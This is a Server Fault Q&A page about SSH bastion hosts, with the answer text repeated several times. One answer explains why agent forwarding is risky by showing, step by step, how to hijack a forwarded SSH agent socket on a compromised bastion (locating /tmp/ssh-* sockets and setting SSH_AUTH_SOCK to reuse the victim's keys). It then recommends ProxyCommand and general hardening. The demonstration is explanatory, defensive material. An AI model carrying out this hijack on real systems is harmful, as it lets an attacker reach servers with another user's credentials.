Let's see connections to this process id.



netstat -nxp | grep 10507


result:



unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion


and who is connected?



lsof -i -a -p 10507


result:



COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)


We can also see socket files:



cd /proc/10507/fd/
ls


result:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


And what happens when client will be connected to remote server? let's see:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


We can even see if socket file is used using netstat:



unix 3 [ ] STREAM CONNECTED 502267 10561/sshd: 
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion


Steal Socket info and IP address



Now we need to steal the socket information while the session of bastion host is open. Oh, we also need destination server IP, so just use netstat:



netstat -tn


The final step to use the forwarded socket file



eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507


Check if the key is loaded.



ssh-add -l


result should be something like that:



2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)


Server is hacked, how to fix the security problem?



Proxy command



Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast

Host bast
Hostname *.*.*.*
ForwardAgent no
User ******


For basic operations: how to transfer files via the servers (from client to server, server to client), you can read on my post here



Conclusion



  • If you use bastion host, don't use AgentForwarding but use
    ProxyCommand

  • Always use non-root user for authentification

  • Use a firewall and block all unnecessary connections.

  • Use SELinux (In general)

  • Block the IP address who tries to log in several times with incorrect credentials

  • If it's not necessary don't give sudo permission to the user

  • Monitor your server

  • Update your server for security patches

More information, see my blog. Additionally I have some screeenshots, so it may be helpfull for you.






share|improve this answer

























  • Thank you very much! actually, we use also google authenticator upon login.

    – user2503775
    Mar 17 at 8:10












  • I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

    – user2503775
    Mar 17 at 10:42












  • Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

    – Huygens
    Mar 17 at 13:24






  • 1





    @Huygens thank you, good advice.

    – grep
    Mar 17 at 16:09











  • @user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

    – grep
    Mar 17 at 16:09















5














I saw the answer about ProxyJump. Let's talk about ProxyCommand.



But wait, wait! I can write to you how to hack the server that uses Agent forwarding, that would be much easier to understand the difference!



Let's hack!



For the basic steps: you can read my post here



Basic steps are the following:



  1. Create bastion users

  2. Disable root login

  3. Block hacking attempts

  4. Change port

  5. Configure firewall

  6. Configure SELinux

How to use AgentForwarding



-Create config in ~/.ssh/config



 Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion


-Add your authentification key to ssh-agent



ssh-add ~/.ssh/name_rsa


-Connect to bastion hos



ssh bast


-Connect application server from the bastion



 ssh app@IP -p PORT


Hacking!



You may, well, ask me the question:




  • Is my server secure? And the answer is quite simple:



    • NO!



  • Why?



    • Because you are using SSH Agent forwarding!



  • And where is the problem?



    • Because Agent forwarding is dangerous and it's consider considered harmful.



  • Why?



    • Let's explain everything inside out: When you connect bastion host your glorious ssh-agent is forwarded. It means that the socket will be set up so that someone may use this socket data to access your servers. Imagine that your bastion server is compromised, If someone has sufficient permissions on your Linux server he/she will just use your socket info. As a result, all your server can be accessed. I know the window of compromise is very small because it depends on how much time you are connected to the bastion host. But do you really want to the risk when you have other options like ProxyCommand? Hence, just use ProxyCommand!


How to hack servers if you compromised bastion host?



Track Target



In /tmp directory you may see something like that:



[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo


Let's open the temporary file



[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507


Let's see connections to this process id.



netstat -nxp | grep 10507


result:



unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion


and who is connected?



lsof -i -a -p 10507


result:



COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)


We can also see socket files:



cd /proc/10507/fd/
ls


result:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


And what happens when client will be connected to remote server? let's see:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


We can even see if socket file is used using netstat:



unix 3 [ ] STREAM CONNECTED 502267 10561/sshd: 
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion


Steal Socket info and IP address



Now we need to steal the socket information while the session of bastion host is open. Oh, we also need destination server IP, so just use netstat:



netstat -tn


The final step to use the forwarded socket file



eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507


Check if the key is loaded.



ssh-add -l


result should be something like that:



2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)


Server is hacked, how to fix the security problem?



Proxy command



Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast

Host bast
Hostname *.*.*.*
ForwardAgent no
User ******


For basic operations: how to transfer files via the servers (from client to server, server to client), you can read on my post here



Conclusion



  • If you use bastion host, don't use AgentForwarding but use
    ProxyCommand

  • Always use non-root user for authentification

  • Use a firewall and block all unnecessary connections.

  • Use SELinux (In general)

  • Block the IP address who tries to log in several times with incorrect credentials

  • If it's not necessary don't give sudo permission to the user

  • Monitor your server

  • Update your server for security patches

More information, see my blog. Additionally I have some screeenshots, so it may be helpfull for you.






share|improve this answer

























  • Thank you very much! actually, we use also google authenticator upon login.

    – user2503775
    Mar 17 at 8:10












  • I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

    – user2503775
    Mar 17 at 10:42












  • Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

    – Huygens
    Mar 17 at 13:24






  • 1





    @Huygens thank you, good advice.

    – grep
    Mar 17 at 16:09











  • @user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

    – grep
    Mar 17 at 16:09













5












5








5







I saw the answer about ProxyJump. Let's talk about ProxyCommand.



But wait, wait! I can write to you how to hack the server that uses Agent forwarding, that would be much easier to understand the difference!



Let's hack!



For the basic steps: you can read my post here



Basic steps are the following:



  1. Create bastion users

  2. Disable root login

  3. Block hacking attempts

  4. Change port

  5. Configure firewall

  6. Configure SELinux

How to use AgentForwarding



-Create config in ~/.ssh/config



 Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion


-Add your authentification key to ssh-agent



ssh-add ~/.ssh/name_rsa


-Connect to bastion hos



ssh bast


-Connect application server from the bastion



 ssh app@IP -p PORT


Hacking!



You may, well, ask me the question:




  • Is my server secure? And the answer is quite simple:



    • NO!



  • Why?



    • Because you are using SSH Agent forwarding!



  • And where is the problem?



    • Because Agent forwarding is dangerous and it's consider considered harmful.



  • Why?



    • Let's explain everything inside out: When you connect bastion host your glorious ssh-agent is forwarded. It means that the socket will be set up so that someone may use this socket data to access your servers. Imagine that your bastion server is compromised, If someone has sufficient permissions on your Linux server he/she will just use your socket info. As a result, all your server can be accessed. I know the window of compromise is very small because it depends on how much time you are connected to the bastion host. But do you really want to the risk when you have other options like ProxyCommand? Hence, just use ProxyCommand!


How to hack servers if you compromised bastion host?



Track Target



In /tmp directory you may see something like that:



[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo


Let's open the temporary file



[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507


Let's see connections to this process id.



netstat -nxp | grep 10507


result:



unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion


and who is connected?



lsof -i -a -p 10507


result:



COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)


We can also see socket files:



cd /proc/10507/fd/
ls


result:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


And what happens when client will be connected to remote server? let's see:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


We can even see if socket file is used using netstat:



unix 3 [ ] STREAM CONNECTED 502267 10561/sshd: 
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion


Steal Socket info and IP address



Now we need to steal the socket information while the session of bastion host is open. Oh, we also need destination server IP, so just use netstat:



netstat -tn


The final step to use the forwarded socket file



eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507


Check if the key is loaded.



ssh-add -l


result should be something like that:



2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)


Server is hacked, how to fix the security problem?



Proxy command



Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast

Host bast
Hostname *.*.*.*
ForwardAgent no
User ******


For basic operations: how to transfer files via the servers (from client to server, server to client), you can read on my post here



Conclusion



  • If you use bastion host, don't use AgentForwarding but use
    ProxyCommand

  • Always use non-root user for authentification

  • Use a firewall and block all unnecessary connections.

  • Use SELinux (In general)

  • Block the IP address who tries to log in several times with incorrect credentials

  • If it's not necessary don't give sudo permission to the user

  • Monitor your server

  • Update your server for security patches

More information, see my blog. Additionally I have some screeenshots, so it may be helpfull for you.






share|improve this answer















I saw the answer about ProxyJump. Let's talk about ProxyCommand.



But wait, wait! I can write to you how to hack the server that uses Agent forwarding, that would be much easier to understand the difference!



Let's hack!



For the basic steps: you can read my post here



Basic steps are the following:



  1. Create bastion users

  2. Disable root login

  3. Block hacking attempts

  4. Change port

  5. Configure firewall

  6. Configure SELinux

How to use AgentForwarding



-Create config in ~/.ssh/config



 Host bast
Hostname BASTION_IP
ForwardAgent yes
User bastion


-Add your authentification key to ssh-agent



ssh-add ~/.ssh/name_rsa


-Connect to bastion hos



ssh bast


-Connect application server from the bastion



 ssh app@IP -p PORT


Hacking!



You may, well, ask me the question:




  • Is my server secure? And the answer is quite simple:



    • NO!



  • Why?



    • Because you are using SSH Agent forwarding!



  • And where is the problem?



    • Because Agent forwarding is dangerous and it's consider considered harmful.



  • Why?



    • Let's explain everything inside out: When you connect bastion host your glorious ssh-agent is forwarded. It means that the socket will be set up so that someone may use this socket data to access your servers. Imagine that your bastion server is compromised, If someone has sufficient permissions on your Linux server he/she will just use your socket info. As a result, all your server can be accessed. I know the window of compromise is very small because it depends on how much time you are connected to the bastion host. But do you really want to the risk when you have other options like ProxyCommand? Hence, just use ProxyCommand!


How to hack servers if you compromised bastion host?



Track Target



In /tmp directory you may see something like that:



[root@localhost tmp]# ll
total 12
drwx------ 2 bastion bastion 4096 Sep 7 17:35 ssh-mKX88v0Vlo


Let's open the temporary file



[root@localhost tmp]# cd ssh-mKX88v0Vlo/
[root@localhost ssh-mKX88v0Vlo]# ll
total 0
srwxr-xr-x 1 bastion bastion 0 Sep 7 17:35 agent.10507


Let's see connections to this process id.



netstat -nxp | grep 10507


result:



unix [ ] STREAM CONNECTED 501384 10507/sshd: bastion


and who is connected?



lsof -i -a -p 10507


result:



COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
sshd 10507 bastion 3u IPv4 501301 0t0 TCP *IP*:ssh->*IP*:8279 (ESTABLISHED)


We can also see socket files:



cd /proc/10507/fd/
ls


result:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


And what happens when client will be connected to remote server? let's see:



lrwx------ 1 root root 64 Sep 7 17:46 0 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 1 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 10 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:48 11 -> socket:[502267]
lrwx------ 1 root root 64 Sep 7 17:46 14 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 15 -> /dev/ptmx
lrwx------ 1 root root 64 Sep 7 17:46 2 -> /dev/null
lrwx------ 1 root root 64 Sep 7 17:46 3 -> socket:[501994]
lrwx------ 1 root root 64 Sep 7 17:46 4 -> socket:[502069]
lrwx------ 1 root root 64 Sep 7 17:46 5 -> socket:[502072]
l-wx------ 1 root root 64 Sep 7 17:46 6 -> /run/systemd/sessions/1836.ref
lr-x------ 1 root root 64 Sep 7 17:46 7 -> pipe:[502079]
l-wx------ 1 root root 64 Sep 7 17:46 8 -> pipe:[502079]
lrwx------ 1 root root 64 Sep 7 17:46 9 -> socket:[502080]


We can even see if socket file is used using netstat:



unix 3 [ ] STREAM CONNECTED 502267 10561/sshd: 
bastion /tmp/ssh-oVoMXC6vb8/agent.10561
unix 3 [ ] STREAM CONNECTED 502072 10561/sshd: bastion


Steal Socket info and IP address



Now we need to steal the socket information while the session of bastion host is open. Oh, we also need destination server IP, so just use netstat:



netstat -tn


The final step to use the forwarded socket file



eval "$(ssh-agent -s)"
SSH_AUTH_SOCK=/tmp/ssh-EAKxOdL4fl/agent.10507


Check if the key is loaded.



ssh-add -l


result should be something like that:



2048 SHA256:2Psdl..B5KQ /home/usr/.ssh/name_rsa (RSA)


Server is hacked, how to fix the security problem?



Proxy command



Host app
Hostname *.*.*.*
IdentityFile ~/.ssh/your_rsa
User *******
Port ****
ProxyCommand ssh -W %h:%p bast

Host bast
Hostname *.*.*.*
ForwardAgent no
User ******


For basic operations: how to transfer files via the servers (from client to server, server to client), you can read on my post here



Conclusion



  • If you use bastion host, don't use AgentForwarding but use
    ProxyCommand

  • Always use non-root user for authentification

  • Use a firewall and block all unnecessary connections.

  • Use SELinux (In general)

  • Block the IP address who tries to log in several times with incorrect credentials

  • If it's not necessary don't give sudo permission to the user

  • Monitor your server

  • Update your server for security patches

More information, see my blog. Additionally I have some screeenshots, so it may be helpfull for you.







share|improve this answer














share|improve this answer



share|improve this answer








edited Mar 17 at 16:33

























answered Mar 15 at 15:41









grepgrep

1614




1614












  • Thank you very much! actually, we use also google authenticator upon login.

    – user2503775
    Mar 17 at 8:10












  • I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

    – user2503775
    Mar 17 at 10:42












  • Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

    – Huygens
    Mar 17 at 13:24






  • 1





    @Huygens thank you, good advice.

    – grep
    Mar 17 at 16:09











  • @user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

    – grep
    Mar 17 at 16:09

















  • Thank you very much! actually, we use also google authenticator upon login.

    – user2503775
    Mar 17 at 8:10












  • I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

    – user2503775
    Mar 17 at 10:42












  • Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

    – Huygens
    Mar 17 at 13:24






  • 1





    @Huygens thank you, good advice.

    – grep
    Mar 17 at 16:09











  • @user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

    – grep
    Mar 17 at 16:09
















Thank you very much! actually, we use also google authenticator upon login.

– user2503775
Mar 17 at 8:10






Thank you very much! actually, we use also google authenticator upon login.

– user2503775
Mar 17 at 8:10














I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

– user2503775
Mar 17 at 10:42






I'm getting an error when trying to call ssh app: channel 0: open failed: administratively prohibited: open failed. stdio forwarding failed. . Do you have an idea why?. At secure log I see: refused local port forward: originator 127.0.0.1 port 65535, target *app-ip* port 22

– user2503775
Mar 17 at 10:42














Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

– Huygens
Mar 17 at 13:24





Cool info. A small advice to improve readability of your answer. Do not copy/paste the content of your blog here. Provide the link and just a summary. Then highlight the real answer part (which for you is using ProxyCommand). I saw you kind of tried it at the beginning but given the copy/paste part it was kind of confusing. Anyway +1

– Huygens
Mar 17 at 13:24




1




1





@Huygens thank you, good advice.

– grep
Mar 17 at 16:09





@Huygens thank you, good advice.

– grep
Mar 17 at 16:09













@user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

– grep
Mar 17 at 16:09





@user2503775 It should be a different problem, not related ssh-agent forwarding/proxy command. Let's open a new question with logs.

– grep
Mar 17 at 16:09











4














Simply use SSH agent forwarding like most others do.



  • The keys will be in ssh agent on your laptop.

  • You login to bastion, authenticated through the agent.

  • From there login to you target host, with authentication request forwarded back to your laptop.

Advantage: there are no keys stored on the bastion that can be misused.



Hope that helps :)






share|improve this answer

























  • Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

    – Huygens
    Mar 14 at 11:02











  • @Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

    – MLu
    Mar 14 at 11:05











  • Indeed this is mixed up :-)

    – Huygens
    Mar 14 at 11:13











  • It's not mixed. I understand the difference. I edited the question to make it clear.

    – user2503775
    Mar 14 at 11:26












  • I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

    – grep
    Mar 15 at 15:46















4














Simply use SSH agent forwarding like most others do.



  • The keys will be in ssh agent on your laptop.

  • You login to bastion, authenticated through the agent.

  • From there login to you target host, with authentication request forwarded back to your laptop.

Advantage: there are no keys stored on the bastion that can be misused.



Hope that helps :)






share|improve this answer

























  • Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

    – Huygens
    Mar 14 at 11:02











  • @Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

    – MLu
    Mar 14 at 11:05











  • Indeed this is mixed up :-)

    – Huygens
    Mar 14 at 11:13











  • It's not mixed. I understand the difference. I edited the question to make it clear.

    – user2503775
    Mar 14 at 11:26












  • I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

    – grep
    Mar 15 at 15:46













4












4








4







Simply use SSH agent forwarding like most others do.



  • The keys will be in ssh agent on your laptop.

  • You login to bastion, authenticated through the agent.

  • From there login to you target host, with authentication request forwarded back to your laptop.

Advantage: there are no keys stored on the bastion that can be misused.



Hope that helps :)






share|improve this answer















Simply use SSH agent forwarding like most others do.



  • The keys will be in ssh agent on your laptop.

  • You login to bastion, authenticated through the agent.

  • From there login to you target host, with authentication request forwarded back to your laptop.

Advantage: there are no keys stored on the bastion that can be misused.



Hope that helps :)







share|improve this answer














share|improve this answer



share|improve this answer








edited Mar 14 at 11:03

























answered Mar 14 at 11:00









MLuMLu

9,72222445




9,72222445












  • Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

    – Huygens
    Mar 14 at 11:02











  • @Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

    – MLu
    Mar 14 at 11:05











  • Indeed this is mixed up :-)

    – Huygens
    Mar 14 at 11:13











  • It's not mixed. I understand the difference. I edited the question to make it clear.

    – user2503775
    Mar 14 at 11:26












  • I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

    – grep
    Mar 15 at 15:46

















  • Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

    – Huygens
    Mar 14 at 11:02











  • @Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

    – MLu
    Mar 14 at 11:05











  • Indeed this is mixed up :-)

    – Huygens
    Mar 14 at 11:13











  • It's not mixed. I understand the difference. I edited the question to make it clear.

    – user2503775
    Mar 14 at 11:26












  • I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

    – grep
    Mar 15 at 15:46
















Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

– Huygens
Mar 14 at 11:02





Hi, that is basically what the OP describes in his/her second bullet. I advise you check the second link provided in the question.

– Huygens
Mar 14 at 11:02













@Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

– MLu
Mar 14 at 11:05





@Huygens true I noticed now. I overloked that as he mixes together TCP forwarding with Agent forwarding.

– MLu
Mar 14 at 11:05













Indeed this is mixed up :-)

– Huygens
Mar 14 at 11:13





Indeed this is mixed up :-)

– Huygens
Mar 14 at 11:13













It's not mixed. I understand the difference. I edited the question to make it clear.

– user2503775
Mar 14 at 11:26






It's not mixed. I understand the difference. I edited the question to make it clear.

– user2503775
Mar 14 at 11:26














I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

– grep
Mar 15 at 15:46





I wrote an answer, how to hack agent forwarding (There is no key but there is socket open). Generally, agent forwarding is okay because the possibility to steal the keys is very low - first of all, you must hack bastion host. Anyway you can see my answer: serverfault.com/a/958466/476642

– grep
Mar 15 at 15:46

















draft saved

draft discarded
















































Thanks for contributing an answer to Server Fault!


  • Please be sure to answer the question. Provide details and share your research!

But avoid


  • Asking for help, clarification, or responding to other answers.

  • Making statements based on opinion; back them up with references or personal experience.

To learn more, see our tips on writing great answers.




draft saved


draft discarded














StackExchange.ready(
function ()
